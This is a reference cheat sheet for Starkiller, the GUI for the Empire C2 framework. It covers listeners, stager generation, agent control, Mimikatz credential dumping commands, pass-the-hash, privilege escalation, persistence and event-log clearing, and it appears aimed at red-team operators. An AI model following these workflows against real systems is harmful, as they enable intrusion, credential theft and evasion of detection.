Starkiller is a modern web-based interface for the Empire C2 framework, streamlining agent management, listener configuration, and post-exploitation workflows through an intuitive GUI instead of CLI-only operations.
| Method | Command | Notes |
|---|
| AppImage | Download from releases, chmod +x Starkiller*.AppImage && ./Starkiller*.AppImage | Standalone, no dependencies |
| Docker | docker run -p 3001:3001 bc1sdc/starkiller:latest | Isolated environment, easy deployment |
| Source | git clone https://github.com/BC-SECURITY/Starkiller && npm install && npm start | Requires Node.js 14+, full control |
| Binary | Download pre-built binaries from GitHub releases | Platform-specific (Linux, macOS, Windows) |
# Connect to Empire Server
# Default: localhost:1337 (Empire API)
# Alternative remote: https://empire-server.local:1337
# Connection Settings
- Username: empire (or custom admin)
- Password: empire (default, change on first login)
- API Token: Auto-generated after successful auth
- SSL/TLS: Configurable (required for production)
| Listener Type | Use Case | Configuration |
|---|
| HTTP | Standard web-based comms, lab/testing | Port 80, callback URL, user agent strings |
| HTTPS | Production, encrypted channel | Port 443, certificate/key, domain fronting |
| SMB | Lateral movement, internal networks | Pipe name, named pipes, SMB beacon |
| DNS | Covert tunnel, firewall evasion | Domain registration, DNS records, timing |
| Custom | Plugins, specialized protocols | Listener modules, Python-based |
1. Listeners → New Listener
2. Select type (HTTP/HTTPS/SMB/DNS)
3. Configure host (0.0.0.0 or specific IP)
4. Set port (80/443 for HTTP/HTTPS)
5. Optional: Domain fronting (CloudFlare, akamai)
6. Set callback headers, user agent
7. Test → Launch
| Stager Type | Delivery | Output Format |
|---|
| Launcher | PowerShell one-liner, macro, script | Base64 encoded or PowerShell direct |
| Multi-Stage | Download agent, compile in-memory | Reduced initial footprint |
| Macro | Office documents (Word, Excel) | VBA payload embedded |
| Batch | CMD batch files, scheduled tasks | Windows native execution |
| HTA | HTML Application, mshta execution | Browser-based delivery |
| Embedded | Compiled binary, shellcode injection | .exe, .dll formats |
1. Stagers → New Stager
2. Select listener (pre-configured)
3. Choose stager type and language
4. Set encode, obfuscation options
5. Generate payload
6. Copy/download for delivery
7. Track generated stagers in list
Dashboard → Agents
- List all active/inactive agents
- Filter by listener, user, hostname, OS
- Last seen timestamp
- Stored credentials per agent
- Kill or interact with agent
| Function | Purpose | Notes |
|---|
| Shell Command | Execute system command | cmd.exe or powershell.exe |
| Load Module | Run exploitation module | Mimikatz, Sherlock, etc. |
| Upload File | Transfer file to agent | Binary/text, obfuscated |
| Download File | Exfiltrate data | Progress tracking, chunked |
| Rename Agent | Change display name | Internal tracking only |
| Kill Agent | Terminate session | Clean shutdown or force |
1. Agents → Click agent name
2. Interactive shell opens
3. Type commands (PowerShell syntax)
4. Output streams in real-time
5. Upload/download via buttons
6. Module execution from dropdown
| Module | Function | Example |
|---|
| Mimikatz | Credential dumping | credentials/mimikatz |
| Sherlock | Vulnerability detection | exploitation/sherlock |
| Bloodhound | AD mapping, pathfinding | recon/bloodhound |
| PowerUp | Privilege escalation checks | exploitation/powerup |
| Empire Launcher | Secondary payload | code_execution |
| WMI | Lateral movement | lateral_movement/wmi |
1. Agent → Interact
2. Select Module dropdown
3. Configure options (listener, target, etc.)
4. Set payload encoding/obfuscation
5. Execute module
6. Monitor output in shell
7. Download results or parse inline
| Type | Source | Data |
|---|
| Plaintext | Dumped passwords, manual entry | Username:password |
| Hash | Mimikatz, SAM dump | NTLM, LM hashes |
| Ticket | Kerberos ticket extraction | .kirbi, base64 encoded |
| Token | Token impersonation | OAuth, API tokens |
| Certificate | Certificate extraction | .pfx, .pem keys |
1. Load Mimikatz module on agent
2. Execute: `privilege::debug` → `sekurlsa::logonpasswords`
3. Credentials appear in Credentials tab
4. Filter/search by username, hash type
5. Export CSV for offline cracking
6. Use credentials for pivot/lateral movement
7. Notes field for tracking source agent
# Agent communicates with configured listener
# Listener type determines covert channel
# Multiple agents → Single listener (fan-in)
# Single agent → Multiple listeners (backup channels)
# Check agent beacon interval
# Modify in listener → Jitter (randomization)
# Detection: Beaconing patterns, metadata, DNS records
| Feature | Use Case | Details |
|---|
| User Accounts | Multi-operator access | Role-based (admin, operator, read-only) |
| API Tokens | Automation, CI/CD | Token auth for scripts |
| Audit Log | Operational tracking | Login, agent commands, downloads |
| Notes/Tags | Team communication | Attach to agents, operations |
| Operation Workspace | Campaign organization | Separate projects, isolated agents |
Settings → Users → New User
- Username: operator1
- Password: (auto-generate or set)
- Role: operator (can execute) or viewer (read-only)
- Save API token for scripting
1. Reports → New Report
2. Select date range (operations period)
3. Include: Agents, listeners, modules executed
4. Filter by operator, listener type
5. Format: PDF (formatted) or CSV (data analysis)
6. Export credentials (with/without hashes)
7. Share with stakeholders (redacted PII as needed)
- Agent list: CSV/JSON (for correlation)
- Module output: Plain text or JSON (parsing)
- Credentials: CSV (Excel, password managers)
- Network log: DNS, HTTP beacon analysis
- Timeline: Sorted by event timestamp
Plugins directory structure:
plugins/
├── listener_custom.py # Custom listener protocol
├── module_custom.py # Exploitation module
├── obfuscator_custom.py # Encoding/evasion
└── stager_custom.py # Delivery method
Load plugin: Settings → Plugins → Upload .zip
Enable/disable without restart
| Feature | Starkiller GUI | Empire CLI |
|---|
| Learning curve | Low (visual, intuitive) | Steep (command memorization) |
| Agent interaction | Real-time web shell | Command feedback loop |
| Listener setup | Form-based, validation | Manual config, error-prone |
| Reporting | One-click PDF export | Manual log parsing |
| Collaboration | Multi-user, audit log | Single-user, manual logging |
| Automation | REST API, limited | Python scripts, full control |
| Workflow speed | Fast (clicking) | Fast (scripting) |
| Advanced control | Limited (GUI constraints) | Full (direct Python) |
1. Create HTTP/HTTPS listener (callback domain)
2. Generate PowerShell launcher stager
3. Deliver via phishing email or web compromise
4. Wait for first beacon (check Dashboard)
5. Interact with agent shell
6. Execute initial reconnaissance
1. Gain agent on domain-joined machine
2. Load/execute Mimikatz module
3. Extract NTLM hashes and plaintext
4. Credentials tab auto-populates
5. Use hashes for pass-the-hash attacks
6. Pivot to other systems (lateral movement)
1. Run Sherlock module (vulnerability scan)
2. Execute PowerUp (privesc checks)
3. Review output for exploitable gaps
4. Load token impersonation module
5. Escalate to SYSTEM or admin token
6. Execute privileged commands
7. Dump SAM hive or LSASS process
# Persistence
1. Load empire launcher module
2. Create scheduled task or registry run key
3. Generate base64 launcher
4. Execute on agent (maintains access)
# Cleanup
1. Kill scheduled task/registry entry
2. Clear Event Logs (via agent)
3. Remove temporary files
4. Disconnect agent gracefully
5. Delete listener (archive first)
| Practice | Implementation |
|---|
| SSL/TLS | Use HTTPS listeners, valid certificates |
| Firewall | Limit Empire API access to operator IPs |
| Credentials | Change default empire/empire on first login |
| Logs | Archive audit logs, review for anomalies |
| Network | Segment C2 from production networks |
| Obfuscation | Enable encoding, vary user agents, domain front |
| Monitoring | SIEM alerts on beacon patterns, failed auth |
| Encryption | Use encrypted channels (SMB pipes, DNS tunnels) |
| Issue | Solution |
|---|
| Agent not beaconing | Check listener IP/port accessible, agent can reach callback |
| Module execution timeout | Increase timeout in settings, retry with smaller scope |
| Connection refused | Verify Empire server running, API port open, credentials correct |
| SSL certificate error | Disable cert verification (labs only) or install valid cert |
| Memory errors on large exports | Export in date ranges, filter agents before export |
| Slow UI response | Clear browser cache, reduce agent count in view, restart Starkiller |
